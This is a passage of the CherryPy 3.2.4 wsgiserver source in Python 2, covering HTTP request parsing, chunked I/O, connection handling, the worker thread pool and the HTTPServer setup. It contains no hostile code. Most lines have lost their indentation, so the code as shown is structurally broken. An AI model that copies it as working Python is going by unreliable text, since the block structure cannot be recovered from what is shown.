should not be generated and the connection should close."""
close_connection = False
"""Signals the calling Connection that the request should close. This does
not imply an error! The client and/or server may each request that the
connection be closed."""
chunked_write = False
"""If True, output will be encoded with the "chunked" transfer-coding.
This value is set automatically inside send_headers."""
def __init__(self, server, conn):
        self.server = server
self.conn = conn
self.ready = False
self.started_request = False
self.scheme = ntob("http")
if self.server.ssl_adapter is not None:
self.scheme = ntob("https")
# Use the lowest-common protocol in case read_request_line errors.
self.response_protocol = 'HTTP/1.0'
self.inheaders = {}
self.status = ""
self.outheaders = []
self.sent_headers = False
self.close_connection = self.__class__.close_connection
self.chunked_read = False
self.chunked_write = self.__class__.chunked_write
def parse_request(self):
"""Parse the next HTTP request start-line and message-headers."""
self.rfile = SizeCheckWrapper(self.conn.rfile,
self.server.max_request_header_size)
try:
success = self.read_request_line()
except MaxSizeExceeded:
self.simple_response("414 Request-URI Too Long",
"The Request-URI sent with the request exceeds the maximum "
"allowed bytes.")
return
else:
if not success:
return
try:
success = self.read_request_headers()
except MaxSizeExceeded:
self.simple_response("413 Request Entity Too Large",
"The headers sent with the request exceed the maximum "
"allowed bytes.")
return
else:
if not success:
return
self.ready = True
def read_request_line(self):
# HTTP/1.1 connections are persistent by default. If a client
# requests a page, then idles (leaves the connection open),
# then rfile.readline() will raise socket.error("timed out").
# Note that it does this based on the value given to settimeout(),
# and doesn't need the client to request or acknowledge the close
# (although your TCP stack might suffer for it: cf Apache's history
# with FIN_WAIT_2).
request_line = self.rfile.readline()
# Set started_request to True so communicate() knows to send 408
# from here on out.
self.started_request = True
if not request_line:
return False
if request_line == CRLF:
# RFC 2616 sec 4.1: "...if the server is reading the protocol
# stream at the beginning of a message and receives a CRLF
# first, it should ignore the CRLF."
# But only ignore one leading line! else we enable a DoS.
request_line = self.rfile.readline()
if not request_line:
return False
if not request_line.endswith(CRLF):
self.simple_response("400 Bad Request", "HTTP requires CRLF terminators")
return False
try:
method, uri, req_protocol = request_line.strip().split(SPACE, 2)
rp = int(req_protocol[5]), int(req_protocol[7])
except (ValueError, IndexError):
self.simple_response("400 Bad Request", "Malformed Request-Line")
return False
self.uri = uri
self.method = method
# uri may be an abs_path (including "http://host.domain.tld");
scheme, authority, path = self.parse_request_uri(uri)
if NUMBER_SIGN in path:
self.simple_response("400 Bad Request",
"Illegal #fragment in Request-URI.")
return False
if scheme:
self.scheme = scheme
qs = EMPTY
if QUESTION_MARK in path:
path, qs = path.split(QUESTION_MARK, 1)
# Unquote the path+params (e.g. "/this%20path" -> "/this path").
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
#
# But note that "...a URI must be separated into its components
# before the escaped characters within those components can be
# safely decoded." http://www.ietf.org/rfc/rfc2396.txt, sec 2.4.2
# Therefore, "/this%2Fpath" becomes "/this%2Fpath", not "/this/path".
try:
atoms = [unquote(x) for x in quoted_slash.split(path)]
except ValueError:
ex = sys.exc_info()[1]
self.simple_response("400 Bad Request", ex.args[0])
return False
path = "%2F".join(atoms)
self.path = path
# Note that, like wsgiref and most other HTTP servers,
# we "% HEX HEX"-unquote the path but not the query string.
self.qs = qs
# Compare request and server HTTP protocol versions, in case our
# server does not support the requested protocol. Limit our output
# to min(req, server). We want the following output:
# request server actual written supported response
# protocol protocol response protocol feature set
# a 1.0 1.0 1.0 1.0
# b 1.0 1.1 1.1 1.0
# c 1.1 1.0 1.0 1.0
# d 1.1 1.1 1.1 1.1
# Notice that, in (b), the response will be "HTTP/1.1" even though
# the client only understands 1.0. RFC 2616 10.5.6 says we should
# only return 505 if the _major_ version is different.
sp = int(self.server.protocol[5]), int(self.server.protocol[7])
if sp[0] != rp[0]:
self.simple_response("505 HTTP Version Not Supported")
return False
self.request_protocol = req_protocol
self.response_protocol = "HTTP/%s.%s" % min(rp, sp)
return True
def read_request_headers(self):
"""Read self.rfile into self.inheaders. Return success."""
# then all the http headers
try:
read_headers(self.rfile, self.inheaders)
except ValueError:
ex = sys.exc_info()[1]
self.simple_response("400 Bad Request", ex.args[0])
return False
mrbs = self.server.max_request_body_size
if mrbs and int(self.inheaders.get("Content-Length", 0)) > mrbs:
self.simple_response("413 Request Entity Too Large",
"The entity sent with the request exceeds the maximum "
"allowed bytes.")
return False
# Persistent connection support
if self.response_protocol == "HTTP/1.1":
# Both server and client are HTTP/1.1
if self.inheaders.get("Connection", "") == "close":
self.close_connection = True
else:
# Either the server or client (or both) are HTTP/1.0
if self.inheaders.get("Connection", "") != "Keep-Alive":
self.close_connection = True
# Transfer-Encoding support
te = None
if self.response_protocol == "HTTP/1.1":
te = self.inheaders.get("Transfer-Encoding")
if te:
te = [x.strip().lower() for x in te.split(",") if x.strip()]
self.chunked_read = False
if te:
for enc in te:
if enc == "chunked":
self.chunked_read = True
else:
# Note that, even if we see "chunked", we must reject
# if there is an extension we don't recognize.
self.simple_response("501 Unimplemented")
self.close_connection = True
return False
# From PEP 333:
# "Servers and gateways that implement HTTP 1.1 must provide
# transparent support for HTTP 1.1's "expect/continue" mechanism.
# This may be done in any of several ways:
# 1. Respond to requests containing an Expect: 100-continue request
# with an immediate "100 Continue" response, and proceed normally.
# 2. Proceed with the request normally, but provide the application
# with a wsgi.input stream that will send the "100 Continue"
# response if/when the application first attempts to read from
# the input stream. The read request must then remain blocked
# until the client responds.
# 3. Wait until the client decides that the server does not support
# expect/continue, and sends the request body on its own.
# (This is suboptimal, and is not recommended.)
#
# We used to do 3, but are now doing 1. Maybe we'll do 2 someday,
# but it seems like it would be a big slowdown for such a rare case.
if self.inheaders.get("Expect", "") == "100-continue":
# Don't use simple_response here, because it emits headers
# we don't want. See http://www.cherrypy.org/ticket/951
msg = self.server.protocol + " 100 Continue\r\n\r\n"
try:
self.conn.wfile.sendall(msg)
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
return True
def parse_request_uri(self, uri):
"""Parse a Request-URI into (scheme, authority, path).
Note that Request-URI's must be one of::
Request-URI = "*" | absoluteURI | abs_path | authority
Therefore, a Request-URI which starts with a double forward-slash
cannot be a "net_path"::
net_path = "//" authority [ abs_path ]
Instead, it must be interpreted as an "abs_path" with an empty first
path segment::
abs_path = "/" path_segments
path_segments = segment *( "/" segment )
segment = *pchar *( ";" param )
param = *pchar
"""
if uri == ASTERISK:
return None, None, uri
i = uri.find('://')
if i > 0 and QUESTION_MARK not in uri[:i]:
# An absoluteURI.
# If there's a scheme (and it must be http or https), then:
# http_URL = "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]]
scheme, remainder = uri[:i].lower(), uri[i + 3:]
authority, path = remainder.split(FORWARD_SLASH, 1)
path = FORWARD_SLASH + path
return scheme, authority, path
if uri.startswith(FORWARD_SLASH):
# An abs_path.
return None, None, uri
else:
# An authority.
return None, uri, None
def respond(self):
"""Call the gateway and write its iterable output."""
mrbs = self.server.max_request_body_size
if self.chunked_read:
self.rfile = ChunkedRFile(self.conn.rfile, mrbs)
else:
cl = int(self.inheaders.get("Content-Length", 0))
if mrbs and mrbs < cl:
if not self.sent_headers:
self.simple_response("413 Request Entity Too Large",
"The entity sent with the request exceeds the maximum "
"allowed bytes.")
return
self.rfile = KnownLengthRFile(self.conn.rfile, cl)
self.server.gateway(self).respond()
if (self.ready and not self.sent_headers):
self.sent_headers = True
self.send_headers()
if self.chunked_write:
self.conn.wfile.sendall("0\r\n\r\n")
def simple_response(self, status, msg=""):
"""Write a simple response back to the client."""
status = str(status)
buf = [self.server.protocol + SPACE +
status + CRLF,
"Content-Length: %s\r\n" % len(msg),
"Content-Type: text/plain\r\n"]
if status[:3] in ("413", "414"):
# Request Entity Too Large / Request-URI Too Long
self.close_connection = True
if self.response_protocol == 'HTTP/1.1':
# This will not be true for 414, since read_request_line
# usually raises 414 before reading the whole line, and we
# therefore cannot know the proper response_protocol.
buf.append("Connection: close\r\n")
else:
# HTTP/1.0 had no 413/414 status nor Connection header.
# Emit 400 instead and trust the message body is enough.
status = "400 Bad Request"
buf.append(CRLF)
if msg:
if isinstance(msg, unicodestr):
msg = msg.encode("ISO-8859-1")
buf.append(msg)
try:
self.conn.wfile.sendall("".join(buf))
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
def write(self, chunk):
"""Write unbuffered data to the client."""
if self.chunked_write and chunk:
buf = [hex(len(chunk))[2:], CRLF, chunk, CRLF]
self.conn.wfile.sendall(EMPTY.join(buf))
else:
self.conn.wfile.sendall(chunk)
def send_headers(self):
"""Assert, process, and send the HTTP response message-headers.
You must set self.status, and self.outheaders before calling this.
"""
hkeys = [key.lower() for key, value in self.outheaders]
status = int(self.status[:3])
if status == 413:
# Request Entity Too Large. Close conn to avoid garbage.
self.close_connection = True
elif "content-length" not in hkeys:
# "All 1xx (informational), 204 (no content),
# and 304 (not modified) responses MUST NOT
# include a message-body." So no point chunking.
if status < 200 or status in (204, 205, 304):
pass
else:
if (self.response_protocol == 'HTTP/1.1'
and self.method != 'HEAD'):
# Use the chunked transfer-coding
self.chunked_write = True
self.outheaders.append(("Transfer-Encoding", "chunked"))
else:
# Closing the conn is the only way to determine len.
self.close_connection = True
if "connection" not in hkeys:
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1 or better
if self.close_connection:
self.outheaders.append(("Connection", "close"))
else:
# Server and/or client are HTTP/1.0
if not self.close_connection:
self.outheaders.append(("Connection", "Keep-Alive"))
if (not self.close_connection) and (not self.chunked_read):
# Read any remaining request body data on the socket.
# "If an origin server receives a request that does not include an
# Expect request-header field with the "100-continue" expectation,
# the request includes a request body, and the server responds
# with a final status code before reading the entire request body
# from the transport connection, then the server SHOULD NOT close
# the transport connection until it has read the entire request,
# or until the client closes the connection. Otherwise, the client
# might not reliably receive the response message. However, this
            # requirement is not to be construed as preventing a server from
# defending itself against denial-of-service attacks, or from
# badly broken client implementations."
remaining = getattr(self.rfile, 'remaining', 0)
if remaining > 0:
self.rfile.read(remaining)
if "date" not in hkeys:
self.outheaders.append(("Date", rfc822.formatdate()))
if "server" not in hkeys:
self.outheaders.append(("Server", self.server.server_name))
buf = [self.server.protocol + SPACE + self.status + CRLF]
for k, v in self.outheaders:
buf.append(k + COLON + SPACE + v + CRLF)
buf.append(CRLF)
self.conn.wfile.sendall(EMPTY.join(buf))
class NoSSLError(Exception):
"""Exception raised when a client speaks HTTP to an HTTPS socket."""
pass
class FatalSSLAlert(Exception):
"""Exception raised when the SSL implementation signals a fatal alert."""
pass
class CP_fileobject(socket._fileobject):
"""Faux file object attached to a socket object."""
def __init__(self, *args, **kwargs):
self.bytes_read = 0
self.bytes_written = 0
socket._fileobject.__init__(self, *args, **kwargs)
def sendall(self, data):
"""Sendall for non-blocking sockets."""
while data:
try:
bytes_sent = self.send(data)
data = data[bytes_sent:]
except socket.error, e:
if e.args[0] not in socket_errors_nonblocking:
raise
def send(self, data):
bytes_sent = self._sock.send(data)
self.bytes_written += bytes_sent
return bytes_sent
def flush(self):
if self._wbuf:
buffer = "".join(self._wbuf)
self._wbuf = []
self.sendall(buffer)
def recv(self, size):
while True:
try:
data = self._sock.recv(size)
self.bytes_read += len(data)
return data
except socket.error, e:
if (e.args[0] not in socket_errors_nonblocking
and e.args[0] not in socket_error_eintr):
raise
if not _fileobject_uses_str_type:
def read(self, size=-1):
# Use max, disallow tiny reads in a loop as they are very inefficient.
# We never leave read() with any leftover data from a new recv() call
# in our internal buffer.
rbufsize = max(self._rbufsize, self.default_bufsize)
# Our use of StringIO rather than lists of string objects returned by
# recv() minimizes memory usage and fragmentation that occurs when
# rbufsize is large compared to the typical return value of recv().
buf = self._rbuf
buf.seek(0, 2) # seek end
if size < 0:
# Read until EOF
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
while True:
data = self.recv(rbufsize)
if not data:
break
buf.write(data)
return buf.getvalue()
else:
# Read until size bytes or EOF seen, whichever comes first
buf_len = buf.tell()
if buf_len >= size:
# Already have size bytes in our buffer? Extract and return.
buf.seek(0)
rv = buf.read(size)
self._rbuf = StringIO.StringIO()
self._rbuf.write(buf.read())
return rv
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
while True:
left = size - buf_len
# recv() will malloc the amount of memory given as its
# parameter even though it often returns much less data
# than that. The returned data string is short lived
# as we copy it into a StringIO and free it. This avoids
# fragmentation issues on many platforms.
data = self.recv(left)
if not data:
break
n = len(data)
if n == size and not buf_len:
# Shortcut. Avoid buffer data copies when:
# - We have no data in our buffer.
# AND
# - Our call to recv returned exactly the
# number of bytes we were asked to read.
return data
if n == left:
buf.write(data)
del data # explicit free
break
assert n <= left, "recv(%d) returned %d bytes" % (left, n)
buf.write(data)
buf_len += n
del data # explicit free
#assert buf_len == buf.tell()
return buf.getvalue()
def readline(self, size=-1):
buf = self._rbuf
buf.seek(0, 2) # seek end
if buf.tell() > 0:
# check if we already have it in our buffer
buf.seek(0)
bline = buf.readline(size)
if bline.endswith('\n') or len(bline) == size:
self._rbuf = StringIO.StringIO()
self._rbuf.write(buf.read())
return bline
del bline
if size < 0:
# Read until \n or EOF, whichever comes first
if self._rbufsize <= 1:
# Speed up unbuffered case
buf.seek(0)
buffers = [buf.read()]
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
data = None
recv = self.recv
while data != "\n":
data = recv(1)
if not data:
break
buffers.append(data)
return "".join(buffers)
buf.seek(0, 2) # seek end
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
while True:
data = self.recv(self._rbufsize)
if not data:
break
nl = data.find('\n')
if nl >= 0:
nl += 1
buf.write(data[:nl])
self._rbuf.write(data[nl:])
del data
break
buf.write(data)
return buf.getvalue()
else:
# Read until size bytes or \n or EOF seen, whichever comes first
buf.seek(0, 2) # seek end
buf_len = buf.tell()
if buf_len >= size:
buf.seek(0)
rv = buf.read(size)
self._rbuf = StringIO.StringIO()
self._rbuf.write(buf.read())
return rv
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
while True:
data = self.recv(self._rbufsize)
if not data:
break
left = size - buf_len
# did we just receive a newline?
nl = data.find('\n', 0, left)
if nl >= 0:
nl += 1
# save the excess data to _rbuf
self._rbuf.write(data[nl:])
if buf_len:
buf.write(data[:nl])
break
else:
# Shortcut. Avoid data copy through buf when returning
# a substring of our first recv().
return data[:nl]
n = len(data)
if n == size and not buf_len:
# Shortcut. Avoid data copy through buf when
# returning exactly all of our first recv().
return data
if n >= left:
buf.write(data[:left])
self._rbuf.write(data[left:])
break
buf.write(data)
buf_len += n
#assert buf_len == buf.tell()
return buf.getvalue()
else:
def read(self, size=-1):
if size < 0:
# Read until EOF
buffers = [self._rbuf]
self._rbuf = ""
if self._rbufsize <= 1:
recv_size = self.default_bufsize
else:
recv_size = self._rbufsize
while True:
data = self.recv(recv_size)
if not data:
break
buffers.append(data)
return "".join(buffers)
else:
# Read until size bytes or EOF seen, whichever comes first
data = self._rbuf
buf_len = len(data)
if buf_len >= size:
self._rbuf = data[size:]
return data[:size]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
left = size - buf_len
recv_size = max(self._rbufsize, left)
data = self.recv(recv_size)
if not data:
break
buffers.append(data)
n = len(data)
if n >= left:
self._rbuf = data[left:]
buffers[-1] = data[:left]
break
buf_len += n
return "".join(buffers)
def readline(self, size=-1):
data = self._rbuf
if size < 0:
# Read until \n or EOF, whichever comes first
if self._rbufsize <= 1:
# Speed up unbuffered case
assert data == ""
buffers = []
while data != "\n":
data = self.recv(1)
if not data:
break
buffers.append(data)
return "".join(buffers)
nl = data.find('\n')
if nl >= 0:
nl += 1
self._rbuf = data[nl:]
return data[:nl]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
data = self.recv(self._rbufsize)
if not data:
break
buffers.append(data)
nl = data.find('\n')
if nl >= 0:
nl += 1
self._rbuf = data[nl:]
buffers[-1] = data[:nl]
break
return "".join(buffers)
else:
# Read until size bytes or \n or EOF seen, whichever comes first
nl = data.find('\n', 0, size)
if nl >= 0:
nl += 1
self._rbuf = data[nl:]
return data[:nl]
buf_len = len(data)
if buf_len >= size:
self._rbuf = data[size:]
return data[:size]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
data = self.recv(self._rbufsize)
if not data:
break
buffers.append(data)
left = size - buf_len
nl = data.find('\n', 0, left)
if nl >= 0:
nl += 1
self._rbuf = data[nl:]
buffers[-1] = data[:nl]
break
n = len(data)
if n >= left:
self._rbuf = data[left:]
buffers[-1] = data[:left]
break
buf_len += n
return "".join(buffers)
class HTTPConnection(object):
"""An HTTP connection (active socket).
server: the Server object which received this connection.
socket: the raw socket object (usually TCP) for this connection.
makefile: a fileobject class for reading from the socket.
"""
remote_addr = None
remote_port = None
ssl_env = None
rbufsize = DEFAULT_BUFFER_SIZE
wbufsize = DEFAULT_BUFFER_SIZE
RequestHandlerClass = HTTPRequest
def __init__(self, server, sock, makefile=CP_fileobject):
self.server = server
self.socket = sock
self.rfile = makefile(sock, "rb", self.rbufsize)
self.wfile = makefile(sock, "wb", self.wbufsize)
self.requests_seen = 0
def communicate(self):
"""Read each request and respond appropriately."""
request_seen = False
try:
while True:
# (re)set req to None so that if something goes wrong in
# the RequestHandlerClass constructor, the error doesn't
# get written to the previous request.
req = None
req = self.RequestHandlerClass(self.server, self)
# This order of operations should guarantee correct pipelining.
req.parse_request()
if self.server.stats['Enabled']:
self.requests_seen += 1
if not req.ready:
# Something went wrong in the parsing (and the server has
# probably already made a simple_response). Return and
# let the conn close.
return
request_seen = True
req.respond()
if req.close_connection:
return
except socket.error:
e = sys.exc_info()[1]
errnum = e.args[0]
# sadly SSL sockets return a different (longer) time out string
if errnum == 'timed out' or errnum == 'The read operation timed out':
# Don't error if we're between requests; only error
# if 1) no request has been started at all, or 2) we're
# in the middle of a request.
# See http://www.cherrypy.org/ticket/853
if (not request_seen) or (req and req.started_request):
# Don't bother writing the 408 if the response
# has already started being written.
if req and not req.sent_headers:
try:
req.simple_response("408 Request Timeout")
except FatalSSLAlert:
# Close the connection.
return
elif errnum not in socket_errors_to_ignore:
self.server.error_log("socket.error %s" % repr(errnum),
level=logging.WARNING, traceback=True)
if req and not req.sent_headers:
try:
req.simple_response("500 Internal Server Error")
except FatalSSLAlert:
# Close the connection.
return
return
except (KeyboardInterrupt, SystemExit):
raise
except FatalSSLAlert:
# Close the connection.
return
except NoSSLError:
if req and not req.sent_headers:
# Unwrap our wfile
self.wfile = CP_fileobject(self.socket._sock, "wb", self.wbufsize)
req.simple_response("400 Bad Request",
"The client sent a plain HTTP request, but "
"this server only speaks HTTPS on this port.")
self.linger = True
except Exception:
e = sys.exc_info()[1]
self.server.error_log(repr(e), level=logging.ERROR, traceback=True)
if req and not req.sent_headers:
try:
req.simple_response("500 Internal Server Error")
except FatalSSLAlert:
# Close the connection.
return
linger = False
def close(self):
"""Close the socket underlying this connection."""
self.rfile.close()
if not self.linger:
# Python's socket module does NOT call close on the kernel socket
# when you call socket.close(). We do so manually here because we
# want this server to send a FIN TCP segment immediately. Note this
# must be called *before* calling socket.close(), because the latter
# drops its reference to the kernel socket.
if hasattr(self.socket, '_sock'):
self.socket._sock.close()
self.socket.close()
else:
# On the other hand, sometimes we want to hang around for a bit
# to make sure the client has a chance to read our entire
# response. Skipping the close() calls here delays the FIN
# packet until the socket object is garbage-collected later.
# Someday, perhaps, we'll do the full lingering_close that
# Apache does, but not today.
pass
class TrueyZero(object):
"""An object which equals and does math like the integer '0' but evals True."""
def __add__(self, other):
return other
def __radd__(self, other):
return other
trueyzero = TrueyZero()
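# Illustrative behaviour of trueyzero (assumed examples): it is truthy, yet it
# adds like zero, which lets the worker-thread stats lambdas below use it as a
# placeholder when no connection is active:
#
#     bool(trueyzero)   # True
#     trueyzero + 42    # 42
#     10 + trueyzero    # 10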
_SHUTDOWNREQUEST = None
class WorkerThread(threading.Thread):
"""Thread which continuously polls a Queue for Connection objects.
Due to the timing issues of polling a Queue, a WorkerThread does not
check its own 'ready' flag after it has started. To stop the thread,
it is necessary to stick a _SHUTDOWNREQUEST object onto the Queue
(one for each running WorkerThread).
"""
conn = None
"""The current connection pulled off the Queue, or None."""
server = None
"""The HTTP Server which spawned this thread, and which owns the
Queue and is placing active connections into it."""
ready = False
"""A simple flag for the calling server to know when this thread
has begun polling the Queue."""
def __init__(self, server):
self.ready = False
self.server = server
self.requests_seen = 0
self.bytes_read = 0
self.bytes_written = 0
self.start_time = None
self.work_time = 0
self.stats = {
'Requests': lambda s: self.requests_seen + ((self.start_time is None) and trueyzero or self.conn.requests_seen),
'Bytes Read': lambda s: self.bytes_read + ((self.start_time is None) and trueyzero or self.conn.rfile.bytes_read),
'Bytes Written': lambda s: self.bytes_written + ((self.start_time is None) and trueyzero or self.conn.wfile.bytes_written),
'Work Time': lambda s: self.work_time + ((self.start_time is None) and trueyzero or time.time() - self.start_time),
'Read Throughput': lambda s: s['Bytes Read'](s) / (s['Work Time'](s) or 1e-6),
'Write Throughput': lambda s: s['Bytes Written'](s) / (s['Work Time'](s) or 1e-6),
}
threading.Thread.__init__(self)
def run(self):
self.server.stats['Worker Threads'][self.getName()] = self.stats
try:
self.ready = True
while True:
conn = self.server.requests.get()
if conn is _SHUTDOWNREQUEST:
return
self.conn = conn
if self.server.stats['Enabled']:
self.start_time = time.time()
try:
conn.communicate()
finally:
conn.close()
if self.server.stats['Enabled']:
self.requests_seen += self.conn.requests_seen
self.bytes_read += self.conn.rfile.bytes_read
self.bytes_written += self.conn.wfile.bytes_written
self.work_time += time.time() - self.start_time
self.start_time = None
self.conn = None
except (KeyboardInterrupt, SystemExit):
exc = sys.exc_info()[1]
self.server.interrupt = exc
class ThreadPool(object):
"""A Request Queue for an HTTPServer which pools threads.
ThreadPool objects must provide min, get(), put(obj), start()
and stop(timeout) attributes.
"""
def __init__(self, server, min=10, max=-1):
self.server = server
self.min = min
self.max = max
self._threads = []
self._queue = queue.Queue()
self.get = self._queue.get
def start(self):
"""Start the pool of threads."""
for i in range(self.min):
self._threads.append(WorkerThread(self.server))
for worker in self._threads:
worker.setName("CP Server " + worker.getName())
worker.start()
for worker in self._threads:
while not worker.ready:
time.sleep(.1)
def _get_idle(self):
"""Number of worker threads which are idle. Read-only."""
return len([t for t in self._threads if t.conn is None])
idle = property(_get_idle, doc=_get_idle.__doc__)
def put(self, obj):
self._queue.put(obj)
if obj is _SHUTDOWNREQUEST:
return
def grow(self, amount):
"""Spawn new worker threads (not above self.max)."""
if self.max > 0:
budget = max(self.max - len(self._threads), 0)
else:
# self.max <= 0 indicates no maximum
budget = float('inf')
n_new = min(amount, budget)
workers = [self._spawn_worker() for i in range(n_new)]
while not self._all(operator.attrgetter('ready'), workers):
time.sleep(.1)
self._threads.extend(workers)
def _spawn_worker(self):
worker = WorkerThread(self.server)
worker.setName("CP Server " + worker.getName())
worker.start()
return worker
def _all(func, items):
results = [func(item) for item in items]
return reduce(operator.and_, results, True)
_all = staticmethod(_all)
def shrink(self, amount):
"""Kill off worker threads (not below self.min)."""
# Grow/shrink the pool if necessary.
# Remove any dead threads from our list
for t in self._threads:
if not t.isAlive():
self._threads.remove(t)
amount -= 1
# calculate the number of threads above the minimum
n_extra = max(len(self._threads) - self.min, 0)
# don't remove more than amount
n_to_remove = min(amount, n_extra)
# put shutdown requests on the queue equal to the number of threads
# to remove. As each request is processed by a worker, that worker
# will terminate and be culled from the list.
for n in range(n_to_remove):
self._queue.put(_SHUTDOWNREQUEST)
def stop(self, timeout=5):
# Must shut down threads here so the code that calls
# this method can know when all threads are stopped.
for worker in self._threads:
self._queue.put(_SHUTDOWNREQUEST)
# Don't join currentThread (when stop is called inside a request).
current = threading.currentThread()
if timeout and timeout >= 0:
endtime = time.time() + timeout
while self._threads:
worker = self._threads.pop()
if worker is not current and worker.isAlive():
try:
if timeout is None or timeout < 0:
worker.join()
else:
remaining_time = endtime - time.time()
if remaining_time > 0:
worker.join(remaining_time)
if worker.isAlive():
# We exhausted the timeout.
# Forcibly shut down the socket.
c = worker.conn
if c and not c.rfile.closed:
try:
c.socket.shutdown(socket.SHUT_RD)
except TypeError:
# pyOpenSSL sockets don't take an arg
c.socket.shutdown()
worker.join()
except (AssertionError,
# Ignore repeated Ctrl-C.
# See http://www.cherrypy.org/ticket/691.
KeyboardInterrupt):
pass
def _get_qsize(self):
return self._queue.qsize()
qsize = property(_get_qsize)
try:
import fcntl
except ImportError:
try:
from ctypes import windll, WinError
except ImportError:
def prevent_socket_inheritance(sock):
"""Dummy function, since neither fcntl nor ctypes are available."""
pass
else:
def prevent_socket_inheritance(sock):
"""Mark the given socket fd as non-inheritable (Windows)."""
if not windll.kernel32.SetHandleInformation(sock.fileno(), 1, 0):
raise WinError()
else:
def prevent_socket_inheritance(sock):
"""Mark the given socket fd as non-inheritable (POSIX)."""
fd = sock.fileno()
old_flags = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, old_flags | fcntl.FD_CLOEXEC)
class SSLAdapter(object):
"""Base class for SSL driver library adapters.
Required methods:
* ``wrap(sock) -> (wrapped socket, ssl environ dict)``
* ``makefile(sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE) -> socket file object``
"""
def __init__(self, certificate, private_key, certificate_chain=None):
self.certificate = certificate
self.private_key = private_key
self.certificate_chain = certificate_chain
def wrap(self, sock):
        raise NotImplementedError
def makefile(self, sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE):
        raise NotImplementedError
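# A minimal SSLAdapter subclass might look like the sketch below. The ssl
# module usage and the way the wrapped socket is returned are assumptions for
# illustration only; the bundled ssl_builtin and ssl_pyopenssl adapters are the
# real implementations.
#
#     import ssl
#     class TrivialSSLAdapter(SSLAdapter):
#         def wrap(self, sock):
#             s = ssl.wrap_socket(sock, server_side=True,
#                                 keyfile=self.private_key,
#                                 certfile=self.certificate)
#             return s, {}
#         def makefile(self, sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE):
#             return CP_fileobject(sock, mode, bufsize)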
class HTTPServer(object):
"""An HTTP server."""
_bind_addr = "127.0.0.1"
_interrupt = None
gateway = None
"""A Gateway instance."""
minthreads = None
"""The minimum number of worker threads to create (default 10)."""
maxthreads = None
"""The maximum number of worker threads to create (default -1 = no limit)."""
server_name = None
"""The name of the server; defaults to socket.gethostname()."""
protocol = "HTTP/1.1"
"""The version string to write in the Status-Line of all HTTP responses.
For example, "HTTP/1.1" is the default. This also limits the supported
features used in the response."""
request_queue_size = 5
"""The 'backlog' arg to socket.listen(); max queued connections (default 5)."""
shutdown_timeout = 5
"""The total time, in seconds, to wait for worker threads to cleanly exit."""
timeout = 10
"""The timeout in seconds for accepted connections (default 10)."""
version = "CherryPy/3.2.4"
"""A version string for the HTTPServer."""
software = None
"""The value to set for the SERVER_SOFTWARE entry in the WSGI environ.
If None, this defaults to ``'%s Server' % self.version``."""
ready = False
"""An internal flag which marks whether the socket is accepting connections."""
max_request_header_size = 0
"""The maximum size, in bytes, for request headers, or 0 for no limit."""
max_request_body_size = 0
"""The maximum size, in bytes, for request bodies, or 0 for no limit."""
nodelay = True
"""If True (the default since 3.1), sets the TCP_NODELAY socket option."""
ConnectionClass = HTTPConnection
"""The class to use for handling HTTP connections."""
ssl_adapter = None
"""An instance of SSLAdapter (or a subclass).
You must have the corresponding SSL driver library installed."""
def __init__(self, bind_addr, gateway, minthreads=10, maxthreads=-1,
server_name=None):
self.bind_addr = bind_addr
self.gateway = gateway
self.requests = ThreadPool(self, min=minthreads or 1, max=maxthreads)
if not server_name:
server_name = socket.gethostname()
self.server_name = server_name
self.clear_stats()
def clear_stats(self):
self._start_time = None
self._run_time = 0
self.stats = {
'Enabled': False,
'Bind Address': lambda s: repr(self.bind_addr),
'Run time': lambda s: (not s['Enabled']) and -1 or self.runtime(),
'Accepts': 0,
'Accepts/sec': lambda s: s['Accepts'] / self.runtime(),
'Queue': lambda s: getattr(self.requests, "qsize", None),
'Threads': lambda s: len(getattr(self.requests, "_threads", [])),
'Threads Idle': lambda s: getattr(self.requests, "idle", None),
'Socket Errors': 0,
'Requests': lambda s: (not s['Enabled']) and -1 or sum([w['Requests'](w) for w
in s['Worker Threads'].values()], 0),
'Bytes Read': lambda s: (not s['Enabled']) and -1 or sum([w['Bytes Read'](w) for w
in s['Worker Threads'].values()], 0),
'Bytes Written': lambda s: (not s['Enabled']) and -1 or sum([w['Bytes Written'](w) for w
in s['Worker Threads'].values()], 0),
'Work Time': lambda s: (not s['Enabled']) and -1 or sum([w['Work Time'](w) for w
in s['Worker Threads'].values()], 0),
'Read Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Read'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0),
'Write Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Written'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0),
'Worker Threads': {},
}
logging.statistics["CherryPy HTTPServer %d" % id(self)] = self.stats
def runtime(self):
if self._start_time is None:
return self._run_time
else:
return self._run_time + (time.time() - self._start_time)
def __str__(self):
return "%s.%s(%r)" % (self.__module__, self.__class__.__name__,
self.bind_addr)
def _get_bind_addr(self):
return self._bind_addr
def _set_bind_addr(self, value):
if isinstance(value, tuple) and value[0] in ('', None):
# Despite the socket module docs, using '' does not
# allow AI_PASSIVE to work. Passing None instead
# returns '0.0.0.0' like we want. In other words:
# host AI_PASSIVE result
# '' Y 192.168.x.y
# '' N 192.168.x.y
# None Y 0.0.0.0
# None N 127.0.0.1
# But since you can get the same effect with an explicit
# '0.0.0.0', we deny both the empty string and None as values.
raise ValueError("Host values of '' or None are not allowed. "
"Use '0.0.0.0' (IPv4) or '::' (IPv6) instead "
